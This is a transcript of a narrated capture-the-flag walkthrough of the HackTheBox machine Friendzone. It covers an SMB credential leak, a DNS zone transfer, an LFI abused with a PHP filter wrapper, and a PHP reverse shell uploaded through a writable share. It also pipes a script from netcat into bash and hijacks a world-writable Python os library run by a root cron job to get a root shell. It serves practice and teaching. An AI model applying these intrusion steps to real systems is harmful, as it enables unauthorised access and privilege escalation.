What's going on YouTube? This is Ipsec, and we're doing Friendzone from HackTheBox, which should be a relatively easy machine as long as you're quick at enumerating things and not going down rabbit holes, because this box is very wide but not too deep. What that means is there's just a lot of services. There's FTP, SMB, DNS, and a bunch of different websites to go examine. But once you find what you're supposed to be looking at, it doesn't take much to find a LFI that you can turn into a code execution, get on the box, and then just poking around normal directories, you find a Python script that imports a library that you can write to. So you can just edit that library with code, and when the cron job runs, it gets executed. So with that being said, let's just jump in and do this box. As always, we'll begin with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it friendzone, and then the IP address, which is 10.10.10.123. Can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open, and when I say it can take a long time to run, this took 1,200 seconds, actually 12,000 seconds, so 3.5 hours to run. And in those cases, you may not want to do scripts. You may just want to do nmap-v for verbose, which shows open ports as it finds it, then 10.10.10.123. We can see it discovered a bunch of open ports and already finished in 2.76 seconds, so much quicker than 3 hours. But let's go over each thing. We have FTP running on port 21, and because script scanning took so long, I'm not going to trust that all the scripts ran, so I'm going to manually try logging into this with anonymous. So FTP 10.10.10.123, anonymous, and we'll see if that logs in. If it doesn't, which it doesn't, we'll try searchploit on VSFTP, and we see all the exploitable versions are like in versions 2. 3 is much bigger than 2, so I'm going to move on until we get credentials for this one. So let's go over to Cherry Tree and just make note of that. Press Ctrl-Shift-N to create a new subnode, and I'll just create a node called Notes, and we'll say FTP open needs creds. And then let's continue on. We have SSH on port 22. Its SSH banner is common with Ubuntu Xennial, but other than that, there's nothing else we can really do. We have DNS on port 53. It is running on TCP, which is a little bit unique, but there's nothing we can really do outside of try doing NSLookup on localhost or its IP address to get a host name disclosure. But since it is running DNS, if we get like subdomains and things like that, that may be possible to brute force. We have HTTP on port 80, and we have the title as Friendzone Escape Software. On 139, we have netbios/SMB, so I'm assuming 445 will be open. The next port is HTTPS on port 443. This HTTP title is Watching You, which is different than Friendzone Escape Software. So we have some type of like virtual host routing software or something going on to give us a different page. There is also an SSL certificate for friendzone.red on this box, so we have a potential host name, which we may want to double check against DNS, which is on port 53. Going down, we have a bunch of HTTP 1.1. This is probably why my scan took forever, because the script just went into some weird loop. So I'm just going to press Shift-G to go to the bottom. We can see SMB is open on port 445. The host is friendzone, so we got potentially the DNS name, 127.0.1.1. I don't know. That's another loopback address. I don't know if it's relevant or not. And then we have host script results. Our clock is about an hour different than the server, I believe, and nothing really interesting here. So the very first thing I'm going to do is SMBMap on 10.10.10.123 to see if there's any files or open shares, and we can see we have general and development. General is read only, development is read write. So I'm going to do SMBMap --help, and we're going to look at options. We have -r to recursively list files, and we can also specify the depth with --depth. So I'm going to go back to my SMBMap command, -R -depth 5, rerun that, and we can see it is going to output files on that share. We get one that is creds.txt. So I'm going to do SMBClient 10.10.10.123 /general. And then I'll just hit enter for the password, and we can do git creds.txt, and we download the file, we can exit and then cat it, and we get admin, and the password is work hallelujah. I'm not even going to bother saying that. Today I learned, for some reason, I can't say this word right now. But let's try FTPing in. So FTP 10.10.10.123 admin, and we'll copy and paste this password, paste it in, and creds did not work. We can try SMBMap. So we'll do -u admin -p, put that password in, and see if this finds anything. And we still see guest SMB session established. So maybe like -d friendzone, because we should see authenticated as. So that's a bit odd. I'm going to try like SMBClient -U admin 10.10.10.123/general, and workgroup admin's password, paste it in. ls, let's see, can we overwrite creds.txt? We can't. Let's try the same thing. Put junk in the password, and we get authenticated. So I'm guessing SMB is configured in a weird way that says guest only. But let's create a subnode here, put creds, because that is definitely probably going to be useful eventually. So let's move on from SMB and check out HTTP. So let's go to 10.10.10.123, and we get this one page. We have email us at info@friendzone.red, and the last hostname we had was friendzone.red, so we have a different domain. So we have two different names we can look at, HTTPS 10.10.10.123, and if we want, we can view this certificate. View certificate, go to details, and go through this. We have an email address, haha@friendzone.red. That again, I'm just looking for like an alternate name to see if we got anything else. We just got two. We got friendzoneportal.red and friendzone.red. We also don't have this saying that HTTP title, which is odd because there should be something that says like watching you. I'm going to try index.html, doesn't exist. Index.php, doesn't exist. I don't know what else to try, so I'm going to stop there. We can try index.php, doesn't exist. .html, it does. So I'm just trying to figure out what this web server is doing. If it has PHP, there's a chance we may be able to look at like parameters or what the page does to try to exploit it. But if it's index.html, chances are it's a static website which has a much smaller attack surface. So notes, HTTP and HTTPS have different pages, virtual host routing. And I'm making a note here because every domain name we get, we should probably check both. So let's do v-etsy host 10.10.10.123, and we can say friendzone.red and friendzoneportal.red. And then go back to Firefox, friendzone.red. Same page. We can also look at, the page source, and don't really see anything. So let's go to HTTPS, friendzone.red, and we get a GIF, or GIF, whatever you want to say. But checking the page source here, we have doing some development with a potential page, js/js. So we can try this, and we get, well, it looks like base64. So let's echo -n, paste base64-d, and I know it's not hex or anything because we got non-hex characters. So I'm going to try base64 again, invalid input. We can try wc-c, 30 characters. I don't know really anything interesting there. Refresh the page, and we get something different each time. So I'm just going to move on from that, but before I do, we got something dynamic happening there. So I check index.php, and the page still loads. So we know that this directory will execute PHP. HTML doesn't exist. So let's put this here, go in, and potential go bust. If we don't find anything else, this directory is interesting, has PHP files, and then move on to friendzone portal.red, and HTTP is the same. HTTPS is a different page, and we don't have anything here. So we got two different names. We got friendzone portal and friendzone.red. DNS is on this box listing as TCP, so I'm going to try a zone transfer with dig axfr. That is just the syntax to do a zone transfer at the host name, or host IP, which is 10.10.10.123, and then the zone, which is friendzone.red. And we can see a few more domains. We got administrator, HR, uploads. So I'm going to pipe this over to zone transfer, and then we can do friendzone portal.red, and we get different pages. So I'm also going to put that to zone transfer with 2 arrows this time to append it. So if I cat this file, we get both, and then I can just grep this for let's do friendzone, and we can grep red. Let's see, let's just grep caret friendzone. That's not going to grab everything. Let's see. Grep friendzone, grep in. There we go. Now we only got host names. Then awk print $1. We can get rid of that trailing dot with sed s \period $. I need to end that quote. And then we can do sort -u. I can put this as host. And then we can edit this file, %s, replace new line characters with a space, and then write that to temp, cat temp, and I'm just going to copy all of this and go into my host file, and we'll paste everything. So now we got all the DNS names set. So the next thing we want to do is a way to view all the pages. So I'm going to go back into hosts, press QA to start recording a macro, type https:// hit the down arrow, hit the home button, exit insert mode, exit recording mode with Q. And now if I just do @a, it will do this, but I can do like 5 @a to do 5 at a time to kind of speed that up. So now that I have a list of all the URLs, we can make a directory called Aquatone, move that into Aquatone, and then I think it's cat the file, and then paste pipe it to Aquatone. Yep, there we go. And now it is hitting each one of those pages and doing screenshots and stuff. So we don't have to individually go to each one, which just kind of speeds it up, especially if you have a lot more than this. So we can go into the HTML, not that. Oh, we can do Firefox Aquatone report and open this up. Let's see. That we can ignore. That's just a GIF. We have administrator 1. Looks like a login portal. So let's go to Cherry Tree. Put this, and we can say login portal. Actually, let's do subdomains, paste, and then let's go down. Another login portal, different one. At least it looks much different. And then let's go down. We can ignore that. That's a meme. We got uploads. So let's do uploads. Not found, not found, not found. Can we just copy? No, we can't. But these may be dir-bust things to do since we get not founds, but let's move with what we have. We have 3 domains. Uploads definitely sounds tempting. So let's go to uploads. Select an image to upload. So let's go here. We can copy image location. cd ... wget the meme. Certificates expired. We'll do curl -k -o z.gif. If I can type, there we go. I'm going to want to go to root HTTP boxes friend zone. So we can just go to this portal and Control L, root HTTP boxes friend zone, z.gif, upload, and we get uploaded successfully and gave us a timestamp. So that's weird, but we can do uploads and timestamp returned, no image. So let's go to the login portal. So we can try logging in with admin, and we get admin page is not developed. Check for another one, and there is a login.php here. We found another login portal here, so let's try this one. Paste this in, admin. We get it saying wrong. We do have creds from way before on that directory, so let's copy admin. You got that. And copy work hallelujah. Still can't say it. I don't know why. I know I've said that word before, but anyways. Login done. Visit /dashboard.php. So dashboard.php. And smart photo script for Friendzone Corp. Note, we are dealing with a beginner PHP developer. Application is not tested. We get image name parameters missing. And it's giving us how we should use this page. So default image ID is a.jpg. Page name is a timestamp. So let's do this. And we get something went wrong. The script included the wrong param. But we get final access timestamp. So if we do enter, nothing there. So let's try page name, go back to this upload and actually put a timestamp. Nothing. If we change a.jpg to z.gif, this thing breaks. So if we do view image, images z.gif doesn't exist. So let's go back and try timestamp. Final access timestamp is this. And that is the same exact thing. Oh no, that is not the same as this. So don't know exactly what this is, but let's try putting other things here. So let's try login. Thinking that page name may just append .php to timestamp, and then maybe timestamp.php. Actually, we can double check that by typing like timestamp.php here, and we see final access timestamp is this. So kind of guessed the logic right there. If we do login, we confirm it. We get wrong. If we give it itself, which is dashboard, we could potentially crash this thing. So we see it's transferring data, and it's going to go with a lot of data because we just looped the script, and it's going to include the dashboard, which is then going to include dashboard again, and then include it again and again and again and again. So that's obviously not ideal. But with LFI inclusions, yeah, we can see it doing it. If this was an old version of PHP, you could try like a null byte at the end, but that hasn't worked in years. Let's just copy this and open a new tab because she did. So we can try that null byte. Doesn't work. So the other thing that you can do with PHP is the I forget what it's called. Maybe I'll remember as I type it. It's php://filter convert.base64-encode/resource equals, and then what file you want to include. So we want to include login. We get the base64 of login. So let's go to terminal, make dir site source, and then we can echo -n, paste the base64, base64-d, and then we can say login.php. And this is actually called a PHP wrapper. So that's what it's called. We see login like this is just hard-coded, same credential we had. We get a cookie and then time, whatever. So let's check what timestamp is. So we can grab this and then echo -n, base64-d, pipe it to timestamp.php, and then view this file, which is just doing the current time. So we could try to find the upload script. So I'm guessing it's probably up one directory in a folder called uploads, and then probably upload.php we saw. We get some base64, copy this, echo -n, paste base64-d to upload.php, and cat this, and we get not finished yet, and all it does is print out the time. So we're not actually uploading a picture. There was another login on, what is it? Whereas it was friendzone/login, I think, or admin.friendzone.red. So maybe like /admin/login. Let's see. We'll see if this is the same thing as what we have if we just went into our own directory. So v echo -n, paste base64-d login2.php, md5 sum login star. So we just went into our own directory. What I'm trying to do is we have administrator 1 and we have admin. And these are different websites, but I can't seem to find where this one is because login.php may have some logic that we want. Right now it's just putting Z's. We can go back all the way and go through our notes or something and kind of think what we have. I didn't take good notes, so that's not going to be helpful. But one of the things that we're missing with SMBMap is comments. It doesn't show them. So if we did SMBClient -L to list shares, 10, 123, and hit enter, we have comments, and it says files is in Etsy files. So I'm guessing general is in Etsy general, and development is in Etsy development. If you went all the way back and we took good notes, we would have seen that SMBMap -H 10, 123. We should have said in notes right up the top, development is equal to read write. So if we upload a script here and we can execute it with /Etsy/development/script, we may be in good shape. So before I do that, I just want to test one more thing with my LFI, and that is instead of /admin log. Don't want to click and hold and drag. I just want to do like Etsy passwd. I want to make sure I can get to the root directory. I did Etsy passwd because I'm almost positive that exists. And I just realized that won't work because it's a pending .php. And that's the same reason why I didn't try to do like var log httpd.log or whatever those LFIs are, is because I know the script is appending.php. So we're just going to have to roll with it. So let's do SMBClient //1010. Oh, before we do that, let's v. We can get out of site source, make dir upload, and we'll v test.php. I'm going to do !php echo, please support me on Patreon, and then end that. So the reason why I'm just doing an echo is because that should almost always work. There are cases where if I do a reverse shell, I don't know if it failed because the firewall, I don't know if PHP safe mode's enabled, I don't know if maybe this is some reason in a Windows box my reverse shell didn't work, SC Linux. There's a bunch of reasons why a reverse shell may fail. On echo, there's very few reasons why echo would fail. We may, if that fails, maybe change it to print, maybe change different languages. But because there's very few reasons for this to fail, it's an easy way to confirm something. So let's do SMBClient //101010 development, no password. We can upload test.php, put test.php. There we go. And now we can try /etc development /test. And we got the page source of that, which we don't need to copy. We can just get rid of this filter. And we can see it pasted out, please support me on Patreon. So now we are ready to do a reverse shell. So I'm going to copy user share, whatever that word is. There's a bunch of things I can't pronounce in this video. And then PHP reverse shell.php. And because I don't want to type that again, we can just do rev.php, edit this, and then the IP address is down here. I think I'm 10.10.14.3 probably. Port 9001, and let's try this. So nc lvnp 9001, put rev.php, put / rev.php, because when I opened this pane, I didn't go back into the upload folder. So let's just do rev, and we get a reverse shell. So we'll do python-c, import pty, pty.spawn, bin bash, Python not found. Is that what it said? Python-c, import pty, pty.spawn, bin bash. Okay. I must have a typo there that I just can't read. So we get that back. I'm going to background this, do stty raw minus echo, hit FG, then enter, hit enter again. And now we have like tab autocomplete and things like that. I'm just going to do export term is equal to xterm. So now when I press Control L, it clears the screen. So let's go in var dub, and we can see all the pages. So we got friendzone portal admin, friendzone portal admin, cat login.php, and that's the one that we wanted. It's got the same credential. We also have a credential here, the mysql data.conf, and we have db user friend, password is that. So we can copy this. So let's go back to cherry tree, go to our creds, friend. We can say this is a DB. This is web. So netstat-anlp, grep for listening. and I don't see any databases listening. I expected like 3306, which is MySQL. So I'm just going to do ls/home. And we see friend is a user. So let's try suing to him, su-friend. We can paste this password, copy, paste, and we get in. So that is how you can get the user.txt. You could also just SSH in, so SSH friend at 10.10.10.123. Paste the password, and now you got a normal shell here. But let's keep going on with the reverse shell. And we don't need that user anymore, so we can exit. Doesn't matter. I just want to prove you could do that, but you don't need to. So if we poke around the box, if we go in like opt, we see there is a server admin directory. We can go into that and see reporter.py. If we do ls-la, there's nothing else there. If we cat reporter.py, we see some type of script, import os to from print, running a command, but it's commented out. Note that says he needs to edit the script later, and then Python developer. So what I'm going to do is, I don't think I have it on my box. Let's see, ls/opt, grep-i PSPY. I do. So let's go grab this. Do I have lscmd? Where's the build? Go build. Let's see. Hopefully it builds. ls, there we go. We have it. So we can copy this, which is just a Go program. Yeah, I'll copy it first. Root, HTTP, boxes, friendzone, and then cd into that directory, and then scp PSPY to friend at 10.10.10.123, and the password, we can go back to cherry tree, copy, paste, SSH, friend at 10.10.10.123, paste, chmod plus x. When we execute this, we can see what programs execute when they execute. So if I went back to this shell, did ls, we don't see anything. But if we wait here long enough, you would see that there is a cron that is running this reporter.py script, which again has a lot of comments and doesn't really do anything. So maybe that's a red herring right now. That's all we can think of, because how would we exploit a print statement without even input? If there was an input, maybe you could exploit it if it's running Python 2, if you found a way to get into standard in. But as of right now, nothing we can do, so I'm going to run LinEnum. So let's go to cp/opt, LinEnum, LinEnum.sh, copy it to my working directory. And there is one change I make in this, and that is, let's see, I put thorough equals to 1 right at the beginning to do thorough checks. So let's cat LinEnum, send it to nclvnp, port 9001, go back to a netcat shell, and just going to go in dev shm in case I write disk, it doesn't do anything, and nc 10.10.14.3, 9001, and pipe that to bash to execute. And we can see LinEnum is running. So while that runs, we can go to SSH and see what's happening. We see stuff showing. This is from the PSPY, and we can see all the commands LinEnum is running. So it's just doing a find, looking for like set UID and things like that, grepping for things. So you can see exactly what's going on in the box with this PSPY thing. But let's go back and just, again, wait for this to finish, which is right then. So let's go to the very top. If we search for LinEnum in our history, did we not? Okay, I don't know why I didn't find it. So here we go. So kernel information, nothing really new. I'm not sure why my search isn't working, but we'll just use the down arrow. Host name, user previously logged on, who's logged on. None of that's interesting. Pass WD, not interesting. Admin users, this ADM, I believe, means he can read logs. I forget what that permission is, but I don't see anything too interesting. If we saw something like LXC or something, we know we could get root. If you don't know how, you can just look at my calamity video. Nothing there. Nothing there. Sudo. That's something we didn't check with friend. If we control... Oh, wait. Here we go. There's the cron running that Python script. But we never checked sudo. So we can do sudo-l, go to cherry tree, copy this password from friend, and we can't run sudo. So keep going down. Hidden files, not too interesting. Word readable files in home, not too interesting. Home directory, not too interesting. Root login is allowed to this box. UMask, again, not interesting. Crons, we don't see any cron for that one script. Cron tabs, contents, nothing. Systemd timers, we don't see any systemd timer executing that Python script or anything that's non-standard. IP information, we looked at netstat. These are running processes. initd, systemd configs, Apache modules. Here's the www directory with everything. Read write sensitive files. We can't write to any sensitive files. SUID. There's nothing non-standard in SUID files. GUID is the same. Let's see. POSIX capability set. mtr-packet. I don't know what this is, so we can copy this and put this in notes to go research it. So, paste, keep going. Word readable files. Word writable files. And we have a script that we uploaded in Etsy development, and we also have userlib python 2.7 os.py, which is the Python library. So right off the bat, I know we have code execution now because we know that there is a script that is executing a Python script which imports OS every certain minutes, because we saw that with PSPY. So what I'm going to do is let's go back into that opt directory. Not opt. Paste userlib python 2.7 os.py. That reporter script is what was exploitable because it's importing OS, which we can write to. So edit the script. VI is screwed. We have to fix the terminal a little bit. There we go. So let's go to a new pane, and I think it's stty-a, and we want 34 rows, 137 columns. So if we go back to a netcat, stty, I think it's, forget how to set. Maybe we'll just do 34 rows, 137 col. stty-a. That's not it. How do we set? Maybe it's the definition first. stty rows 34, col 137. Invalid argument. Columns 137. That looks good. And double check. Those are the correct numbers. So now when we do that VI command again, our terminal is all set because it knows the correct number, rows, columns, and earlier we set xterm to, or terminal to xterm. So you want those 3 variables. You want to have your terminal configured, and you want to do stty to do rows and columns configured if you want to go into any of these like GUI applications. So now we just have to do a Python reverse shell. So what I'm going to do is we're going to Google payload all. I have payload all the things copied, I think. cd opt payload all the things. This is just a GitHub repository. And let's see. ls grep-i shell. Let's just do payload all the things. Python reverse shell. And here we go. Reverse shell cheat sheet. So let's go to Python. And let's see. We don't want this one because it's running bash commands first. This looks fine. So we can copy this. And then let's edit it. So v shell.py, paste. So let's see. We want to replace every semicolon with a new line. That did not work. Replace every semicolon with a new line. That worked now. So the one thing we have to do is get rid of these OS period, because this is calling the OS library. So that's fixed. Import socket. We want to do our IP address, which is 10.10.14.3 on port 9001. And that looks fine. So let's cat shell.py. Copy. Paste. And then we'll just wait. We can exit here. nclvmp 9001. If we wanted to, and we could just test it with python reporter.py, we immediately get a shell, but because we executed that, we didn't get a shell as anyone important. So we can just do this now and wait for that cron to run. And we see it ran right then. If we do who am I, we are root, and we can read root.txt. So that is the box. Hope you guys enjoyed. Take care, and I will see you all next week.